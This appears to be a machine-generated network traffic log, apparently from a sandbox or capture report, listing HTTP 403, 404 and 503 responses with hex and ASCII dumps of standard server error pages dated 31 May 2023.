                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:51:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=17X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 2f3e9ae2-5140-4ed9-b432-4244358873d2CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xXsIzNwNDUIwQbNnMaJWU5Nv0rR0eL0szzt7024kDr%2FzrGC4jx20Cct1p%2FMlvDYTkYmEERB1wWsTIhTeolR5PiuJiQ4tOC00rkZkE4REorg0D4vvIJ00Npr6zkiI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=157.999992Server: cloudflareCF-RAY: 7cff592e48ca9b63-FRAalt-svc: h3=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:27 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Wed, 31 May 2023 12:51:27 GMTContent-Type: text/htmlContent-Length: 918Connection: keep-aliveLast-Modified: Mon, 27 Jan 2020 20:24:24 GMTETag: "396-59d24e4b2e24e"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 35 30 33 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 20 70 72 6f 62 6c 65 6d 73 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: namecheap-nginxData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:27 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Wed, 31 May 2023 12:51:28 GMTContent-Type: text/htmlContent-Length: 918Connection: keep-aliveLast-Modified: Mon, 27 Jan 2020 20:24:24 GMTETag: "396-59d24e4b2e24e"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 35 30 33 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 20 70 72 6f 62 6c 65 6d 73 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:28 GMTServer: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_uploader/3.2.0Content-Length: 202Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:28 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 699date: Wed, 31 May 2023 12:51:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 20 69 73 20 64 65 6e 69 65 64 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">403</h1><h2 style="margin-top:20px;font-size: 30px;">Forbidden</h2><p>Access
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Zen-Fury: d26294b284d2ab12879750a58f791335b682f0c6Server: ZENEDGECache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Cache-Status: Date: Wed, 31 May 2023 12:51:29 GMTData Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 32 33 38 31 22 2c 20 31 36 38 35 35 33 37 34 37 36 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 